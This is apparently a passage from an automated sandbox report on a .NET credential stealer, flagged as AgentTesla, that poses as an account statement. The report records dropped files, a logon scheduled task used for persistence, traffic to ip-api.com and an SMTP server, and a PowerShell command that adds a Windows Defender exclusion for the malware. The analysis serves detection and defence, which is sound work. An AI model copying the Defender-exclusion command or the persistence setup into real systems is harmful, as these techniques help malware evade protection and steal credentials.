                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p3nqfhd4.35i.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0tc3v3q.egd.ps1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xsh0e31k.x3w.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zzva54p5.5aw.psm1

                                            Download File
                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\tmpC678.tmp

                                            Download File
                                            Process:C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1601
                                            Entropy (8bit):5.108633823969318
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLGxvn:cge7QYrFdOFzOzN33ODOiDdKrsuT2v
                                            MD5:311309CCB2289C24505110FE1A5449D0
                                            SHA1:01B0D0054BCDD85CC64FD8D1CE48AA2637062B8B
                                            SHA-256:E505613BD46CF611D0F5F79FCC1BC020F85309C7DD1FF281317402973E7B2186
                                            SHA-512:46AC33A1C232AAA711D21C8D28829EB22845CA8DFFD76907510122210EBAA6CD10F3CC072272EE85F6A8252CC990DDF18CBE84236470267AF5CA78D15DAC7077
                                            Malicious:true
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                            C:\Users\user\AppData\Local\Temp\tmpD609.tmp

                                            Download File
                                            Process:C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe
                                            File Type:XML 1.0 document, ASCII text
                                            Category:dropped
                                            Size (bytes):1601
                                            Entropy (8bit):5.108633823969318
                                            Encrypted:false
                                            SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLGxvn:cge7QYrFdOFzOzN33ODOiDdKrsuT2v
                                            MD5:311309CCB2289C24505110FE1A5449D0
                                            SHA1:01B0D0054BCDD85CC64FD8D1CE48AA2637062B8B
                                            SHA-256:E505613BD46CF611D0F5F79FCC1BC020F85309C7DD1FF281317402973E7B2186
                                            SHA-512:46AC33A1C232AAA711D21C8D28829EB22845CA8DFFD76907510122210EBAA6CD10F3CC072272EE85F6A8252CC990DDF18CBE84236470267AF5CA78D15DAC7077
                                            Malicious:false
                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                            C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe

                                            Download File
                                            Process:C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe
                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Category:dropped
                                            Size (bytes):1031168
                                            Entropy (8bit):7.3124238980608
                                            Encrypted:false
                                            SSDEEP:24576:0f7y6rwJVCUv7MQehWtnEYVe5+2brHkfbwHo7m:xj/DMV4tebHYbwGm
                                            MD5:25E87D17F0C864FFDC217D43C82CC36C
                                            SHA1:AECD0FF1A25D22ACE6AB1C9650589CA916CABF3F
                                            SHA-256:37FDA41FDB04917E4C0DA2880B51BA07E959D53A31A93A9B47785A5BE8807BD7
                                            SHA-512:D1809508E78D48D398E48602A381C7E3BD45295A7B5BBD25403BF1EDD351B495CB85C4E2076099B97401E1D41DFD36670540D7431CF8C8C5CA574F96147C304D
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                            • Antivirus: ReversingLabs, Detection: 37%
                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p"f..............0.............".... ........@.. ....................... ............@.....................................O.......................................T............................................ ............... ..H............text...(.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........N...W..........T...............................................^..}.....(.......(.....*&..(.....*...0..+.........,..{.......+....,...{....o........( ....*..0..=.........s!...}.....s"...}.....s#...}.....($.....{........s%...o&.....{.....s'...o(.....{.....o).....{....r...po*.....{.... o....<s+...o,.....{.....o-.....{....r...po......{.... -....js%...o&.....{....r:..po*.....{.....K..s+...o,.....{.....o-.....{....rD..po......{.....o/.....{...........s0...o1.....{.....o2..

                                            C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe:Zone.Identifier

                                            Download File
                                            Process:C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):26
                                            Entropy (8bit):3.95006375643621
                                            Encrypted:false
                                            SSDEEP:3:ggPYV:rPYV
                                            MD5:187F488E27DB4AF347237FE461A079AD
                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                            Malicious:false
                                            Preview:[ZoneTransfer]....ZoneId=0

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.3124238980608
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Windows Screen Saver (13104/52) 0.07%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            File name:UPDATED SSTATEMENT OF ACCOUNT.exe
                                            File size:1'031'168 bytes
                                            MD5:25e87d17f0c864ffdc217d43c82cc36c
                                            SHA1:aecd0ff1a25d22ace6ab1c9650589ca916cabf3f
                                            SHA256:37fda41fdb04917e4c0da2880b51ba07e959d53a31a93a9b47785a5be8807bd7
                                            SHA512:d1809508e78d48d398e48602a381c7e3bd45295a7b5bbd25403bf1edd351b495cb85c4e2076099b97401e1d41dfd36670540d7431cf8c8c5ca574f96147c304d
                                            SSDEEP:24576:0f7y6rwJVCUv7MQehWtnEYVe5+2brHkfbwHo7m:xj/DMV4tebHYbwGm
                                            TLSH:7225E23D0CBE1A3B9176D2AACFE88567F040D47B39126D7A94D383958346A9379C313E
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p"f..............0.............".... ........@.. ....................... ............@................................

                                            File Icon

                                            Icon Hash:00928e8e8686b000

                                            Static PE Info

                                            General

                                            Entrypoint:0x4fd022
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x6622708E [Fri Apr 19 13:24:30 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0xfcfcf0x4f.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0xfe0000x5f0.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1000000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0xfb30c0x54.text
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000xfb0280xfb2001ddb7808f4082a882dedb84b7807dba3False0.7935384519661524data7.318017102591194IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0xfe0000x5f00x60072ad7b120d9e542282d9119eb6a3d2c6False0.439453125data4.195996894871083IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x1000000xc0x200bcee61620cddc0ba58106cba59a9209cFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0xfe0900x360data0.4363425925925926
                                            RT_MANIFEST0xfe4000x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 19, 2024 17:14:00.019898891 CEST49674443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:00.022052050 CEST49673443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:00.285495996 CEST49672443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:04.222758055 CEST4971180192.168.2.6208.95.112.1
                                            Apr 19, 2024 17:14:04.339114904 CEST8049711208.95.112.1192.168.2.6
                                            Apr 19, 2024 17:14:04.342086077 CEST4971180192.168.2.6208.95.112.1
                                            Apr 19, 2024 17:14:04.356827021 CEST4971180192.168.2.6208.95.112.1
                                            Apr 19, 2024 17:14:04.475250959 CEST8049711208.95.112.1192.168.2.6
                                            Apr 19, 2024 17:14:04.519870996 CEST4971180192.168.2.6208.95.112.1
                                            Apr 19, 2024 17:14:05.480058908 CEST49712587192.168.2.6135.181.124.14
                                            Apr 19, 2024 17:14:06.582465887 CEST49712587192.168.2.6135.181.124.14
                                            Apr 19, 2024 17:14:07.591602087 CEST4971480192.168.2.6208.95.112.1
                                            Apr 19, 2024 17:14:07.709563017 CEST8049714208.95.112.1192.168.2.6
                                            Apr 19, 2024 17:14:07.709660053 CEST4971480192.168.2.6208.95.112.1
                                            Apr 19, 2024 17:14:07.710444927 CEST4971480192.168.2.6208.95.112.1
                                            Apr 19, 2024 17:14:07.834146976 CEST8049714208.95.112.1192.168.2.6
                                            Apr 19, 2024 17:14:07.879276037 CEST4971480192.168.2.6208.95.112.1
                                            Apr 19, 2024 17:14:08.355324030 CEST4971180192.168.2.6208.95.112.1
                                            Apr 19, 2024 17:14:08.503844976 CEST49715587192.168.2.6135.181.124.14
                                            Apr 19, 2024 17:14:09.539673090 CEST49715587192.168.2.6135.181.124.14
                                            Apr 19, 2024 17:14:09.676163912 CEST49673443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:09.707372904 CEST49674443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:09.987772942 CEST49672443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:11.302365065 CEST44349706173.222.162.64192.168.2.6
                                            Apr 19, 2024 17:14:11.302675962 CEST49706443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:11.551305056 CEST49715587192.168.2.6135.181.124.14
                                            Apr 19, 2024 17:14:15.566844940 CEST49715587192.168.2.6135.181.124.14
                                            Apr 19, 2024 17:14:21.602996111 CEST49706443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:21.604033947 CEST49706443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:21.609772921 CEST49720443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:21.609818935 CEST44349720173.222.162.64192.168.2.6
                                            Apr 19, 2024 17:14:21.609991074 CEST49720443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:21.615868092 CEST49720443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:21.615890026 CEST44349720173.222.162.64192.168.2.6
                                            Apr 19, 2024 17:14:21.755851030 CEST44349706173.222.162.64192.168.2.6
                                            Apr 19, 2024 17:14:21.756606102 CEST44349706173.222.162.64192.168.2.6
                                            Apr 19, 2024 17:14:21.948985100 CEST44349720173.222.162.64192.168.2.6
                                            Apr 19, 2024 17:14:21.949059963 CEST49720443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:22.147676945 CEST49720443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:22.147701979 CEST44349720173.222.162.64192.168.2.6
                                            Apr 19, 2024 17:14:22.148266077 CEST44349720173.222.162.64192.168.2.6
                                            Apr 19, 2024 17:14:22.148329973 CEST49720443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:22.150605917 CEST49720443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:22.150636911 CEST44349720173.222.162.64192.168.2.6
                                            Apr 19, 2024 17:14:22.150854111 CEST49720443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:22.196127892 CEST44349720173.222.162.64192.168.2.6
                                            Apr 19, 2024 17:14:22.587204933 CEST44349720173.222.162.64192.168.2.6
                                            Apr 19, 2024 17:14:22.587266922 CEST49720443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:22.587819099 CEST44349720173.222.162.64192.168.2.6
                                            Apr 19, 2024 17:14:22.587872028 CEST49720443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:22.587892056 CEST44349720173.222.162.64192.168.2.6
                                            Apr 19, 2024 17:14:22.587943077 CEST49720443192.168.2.6173.222.162.64
                                            Apr 19, 2024 17:14:23.566780090 CEST49715587192.168.2.6135.181.124.14
                                            Apr 19, 2024 17:14:40.957426071 CEST8049714208.95.112.1192.168.2.6
                                            Apr 19, 2024 17:14:40.957660913 CEST4971480192.168.2.6208.95.112.1
                                            Apr 19, 2024 17:14:58.504637003 CEST4971480192.168.2.6208.95.112.1
                                            Apr 19, 2024 17:14:58.622822046 CEST8049714208.95.112.1192.168.2.6
                                            Apr 19, 2024 17:15:39.770505905 CEST4970480192.168.2.6199.232.210.172
                                            Apr 19, 2024 17:15:39.874782085 CEST8049704199.232.210.172192.168.2.6
                                            Apr 19, 2024 17:15:39.874823093 CEST8049704199.232.210.172192.168.2.6
                                            Apr 19, 2024 17:15:39.874918938 CEST4970480192.168.2.6199.232.210.172

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Apr 19, 2024 17:14:04.097760916 CEST6333153192.168.2.61.1.1.1
                                            Apr 19, 2024 17:14:04.202157974 CEST53633311.1.1.1192.168.2.6
                                            Apr 19, 2024 17:14:05.348422050 CEST5245853192.168.2.61.1.1.1
                                            Apr 19, 2024 17:14:05.479351997 CEST53524581.1.1.1192.168.2.6

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                            Apr 19, 2024 17:14:04.097760916 CEST192.168.2.61.1.1.10x2403Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                            Apr 19, 2024 17:14:05.348422050 CEST192.168.2.61.1.1.10x95e0Standard query (0)mail.tabcoeng.comA (IP address)IN (0x0001)false

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                            Apr 19, 2024 17:14:04.202157974 CEST1.1.1.1192.168.2.60x2403No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                            Apr 19, 2024 17:14:05.479351997 CEST1.1.1.1192.168.2.60x95e0No error (0)mail.tabcoeng.com135.181.124.14A (IP address)IN (0x0001)false
                                            Apr 19, 2024 17:14:20.796916008 CEST1.1.1.1192.168.2.60x573eNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                            Apr 19, 2024 17:14:20.796916008 CEST1.1.1.1192.168.2.60x573eNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                            Apr 19, 2024 17:14:21.364387989 CEST1.1.1.1192.168.2.60x6cbeNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                            Apr 19, 2024 17:14:21.364387989 CEST1.1.1.1192.168.2.60x6cbeNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                            Apr 19, 2024 17:15:21.811800957 CEST1.1.1.1192.168.2.60x7da0No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                            Apr 19, 2024 17:15:21.811800957 CEST1.1.1.1192.168.2.60x7da0No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                            HTTP Request Dependency Graph

                                            • ip-api.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            0192.168.2.649711208.95.112.1803392C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 19, 2024 17:14:04.356827021 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                            Host: ip-api.com
                                            Connection: Keep-Alive
                                            Apr 19, 2024 17:14:04.475250959 CEST174INHTTP/1.1 200 OK
                                            Date: Fri, 19 Apr 2024 15:14:03 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Content-Length: 5
                                            Access-Control-Allow-Origin: *
                                            X-Ttl: 60
                                            X-Rl: 44
                                            Data Raw: 74 72 75 65 0a
                                            Data Ascii: true


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            1192.168.2.649714208.95.112.1804548C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                            TimestampBytes transferredDirectionData
                                            Apr 19, 2024 17:14:07.710444927 CEST80OUTGET /line/?fields=hosting HTTP/1.1
                                            Host: ip-api.com
                                            Connection: Keep-Alive
                                            Apr 19, 2024 17:14:07.834146976 CEST174INHTTP/1.1 200 OK
                                            Date: Fri, 19 Apr 2024 15:14:07 GMT
                                            Content-Type: text/plain; charset=utf-8
                                            Content-Length: 5
                                            Access-Control-Allow-Origin: *
                                            X-Ttl: 60
                                            X-Rl: 44
                                            Data Raw: 74 72 75 65 0a
                                            Data Ascii: true


                                            Statistics

                                            CPU Usage

                                            Click to jump to process

                                            Memory Usage

                                            Click to jump to process

                                            High Level Behavior Distribution

                                            Click to dive into process behavior distribution

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            General

                                            Target ID:0
                                            Start time:17:14:01
                                            Start date:19/04/2024
                                            Path:C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"
                                            Imagebase:0xd10000
                                            File size:1'031'168 bytes
                                            MD5 hash:25E87D17F0C864FFDC217D43C82CC36C
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:low
                                            Has exited:true

                                            General

                                            Target ID:2
                                            Start time:17:14:02
                                            Start date:19/04/2024
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe"
                                            Imagebase:0x410000
                                            File size:433'152 bytes
                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            General

                                            Target ID:3
                                            Start time:17:14:02
                                            Start date:19/04/2024
                                            Path:C:\Windows\System32\conhost.exe
